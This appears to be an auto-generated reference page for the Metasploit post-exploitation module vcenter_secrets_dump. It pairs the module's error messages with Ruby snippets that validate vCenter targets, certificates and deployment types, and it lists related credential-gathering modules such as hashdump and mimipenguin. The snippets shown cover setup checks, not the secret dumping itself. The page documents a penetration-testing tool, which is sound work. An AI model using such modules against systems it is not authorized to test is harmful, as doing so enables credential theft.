778: idm_json['certificates'].each do |idm|
779: cert_verify = validate_x509_cert(idm['encoded'])
780: if cert_verify.nil?
781: print_error('Invalid x509 certificate extracted from IDM!')
782: return false
783: end
784: next unless cert == cert_verify
785:
786: return true
Unable to parse IDM tenant certificates downloaded from http://localhost:7080/idm/tenant/ on local vCenter
Here is a relevant code snippet related to the "Unable to parse IDM tenant certificates downloaded from http://localhost:7080/idm/tenant/ on local vCenter" error message:
784: next unless cert == cert_verify
785:
786: return true
787: end
788: else
789: print_error('Unable to parse IDM tenant certificates downloaded from http://localhost:7080/idm/tenant/ on local vCenter')
790: return false
791: end
792:
793: print_error('No vSphere IDM tenant certificates returned from http://localhost:7080/idm/tenant/')
794: false
No vSphere IDM tenant certificates returned from http://localhost:7080/idm/tenant/
Here is a relevant code snippet related to the "No vSphere IDM tenant certificates returned from http://localhost:7080/idm/tenant/" error message:
788: else
789: print_error('Unable to parse IDM tenant certificates downloaded from http://localhost:7080/idm/tenant/ on local vCenter')
790: return false
791: end
792:
793: print_error('No vSphere IDM tenant certificates returned from http://localhost:7080/idm/tenant/')
794: false
795: end
796:
797: def validate_target
798: # this enumeration phase will also go away once the sso part moves to lib
Could not find <V>
Here is a relevant code snippet related to the "Could not find <V>" error message:
798: # this enumeration phase will also go away once the sso part moves to lib
799: vprint_status('Enumerating universal vSphere binaries ...')
800: vsphere_bin.each do |k, v|
801: vprint_good("\t#{k}: #{v}")
802: unless command_exists?(v)
803: fail_with(Msf::Exploit::Failure::NoTarget, "Could not find #{v}")
804: end
805: end
806:
807: if vcenter_management
808: vc_db_type = get_database_type
This module only supports embedded PostgreSQL, appliance reports DB type '<VC_DB_TYPE>'
Here is a relevant code snippet related to the "This module only supports embedded PostgreSQL, appliance reports DB type '<VC_DB_TYPE>'" error message:
805: end
806:
807: if vcenter_management
808: vc_db_type = get_database_type
809: unless vc_db_type == 'embedded'
810: fail_with(Msf::Exploit::Failure::NoTarget, "This module only supports embedded PostgreSQL, appliance reports DB type '#{vc_db_type}'")
811: end
812:
813: unless command_exists?(psql_bin)
814: fail_with(Msf::Exploit::Failure::NoTarget, "Could not find #{psql_bin}")
815: end
Could not find <PSQL_BIN>
Here is a relevant code snippet related to the "Could not find <PSQL_BIN>" error message:
809: unless vc_db_type == 'embedded'
810: fail_with(Msf::Exploit::Failure::NoTarget, "This module only supports embedded PostgreSQL, appliance reports DB type '#{vc_db_type}'")
811: end
812:
813: unless command_exists?(psql_bin)
814: fail_with(Msf::Exploit::Failure::NoTarget, "Could not find #{psql_bin}")
815: end
816: end
817:
818: self.vcenter_fqdn = get_fqdn
819: if vcenter_fqdn.nil?
Could not determine vCenter DNS FQDN
Here is a relevant code snippet related to the "Could not determine vCenter DNS FQDN" error message:
815: end
816: end
817:
818: self.vcenter_fqdn = get_fqdn
819: if vcenter_fqdn.nil?
820: print_bad('Could not determine vCenter DNS FQDN')
821: self.vcenter_fqdn = ''
822: end
823:
824: vsphere_machine_ipv4 = get_ipv4
825: if vsphere_machine_ipv4.nil? || !Rex::Socket.is_ipv4?(vsphere_machine_ipv4)
Could not determine vCenter IPv4 address
Here is a relevant code snippet related to the "Could not determine vCenter IPv4 address" error message:
821: self.vcenter_fqdn = ''
822: end
823:
824: vsphere_machine_ipv4 = get_ipv4
825: if vsphere_machine_ipv4.nil? || !Rex::Socket.is_ipv4?(vsphere_machine_ipv4)
826: print_bad('Could not determine vCenter IPv4 address')
827: else
828: print_status("Appliance IPv4: #{vsphere_machine_ipv4}")
829: end
830:
831: self.vc_psc_fqdn = get_platform_service_controller(vc_type_management)
Could not find /etc/vmware/deployment.node.type
Here is a relevant code snippet related to the "Could not find /etc/vmware/deployment.node.type" error message:
853: self.vc_type_management = false
854:
855: vcsa_type = get_deployment_type
856: case vcsa_type
857: when nil
858: fail_with(Msf::Exploit::Failure::BadConfig, 'Could not find /etc/vmware/deployment.node.type')
859: when 'embedded' # Integrated vCenter and PSC
860: self.vc_deployment_type = 'vCenter Appliance (Embedded)'
861: self.vc_type_embedded = true
862: when 'infrastructure' # PSC only
863: self.vc_deployment_type = 'vCenter Platform Service Controller'
Unable to determine appliance deployment type returned from server: <VCSA_TYPE>
Here is a relevant code snippet related to the "Unable to determine appliance deployment type returned from server: <VCSA_TYPE>" error message:
864: self.vc_type_infrastructure = true
865: when 'management' # vCenter only
866: self.vc_deployment_type = 'vCenter Appliance (Management)'
867: self.vc_type_management = true
868: else
869: fail_with(Msf::Exploit::Failure::Unknown, "Unable to determine appliance deployment type returned from server: #{vcsa_type}")
870: end
871:
872: if vcenter_management
873: self.vcsa_build = get_vcenter_build
874: end
Related Pull Requests
- #17213 Merged Pull Request: Update identify hash library and call
- #16871 Merged Pull Request: Add vcenter_secrets_dump post module
See Also
Check also the following modules related to this module:
- post/linux/gather/checkcontainer
- post/linux/gather/checkvm
- post/linux/gather/ecryptfs_creds
- post/linux/gather/enum_commands
- post/linux/gather/enum_configs
- post/linux/gather/enum_containers
- post/linux/gather/enum_nagios_xi
- post/linux/gather/enum_network
- post/linux/gather/enum_protections
- post/linux/gather/enum_psk
- post/linux/gather/enum_system
- post/linux/gather/enum_users_history
- post/linux/gather/gnome_commander_creds
- post/linux/gather/gnome_keyring_dump
- post/linux/gather/haserl_read
- post/linux/gather/hashdump
- post/linux/gather/manageengine_password_manager_creds
- post/linux/gather/mimipenguin
- post/linux/gather/mount_cifs_creds
- post/linux/gather/openvpn_credentials
- post/linux/gather/phpmyadmin_credsteal
- post/linux/gather/pptpd_chap_secrets
- post/linux/gather/tor_hiddenservices
Authors
npm[at]cesium137.io
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.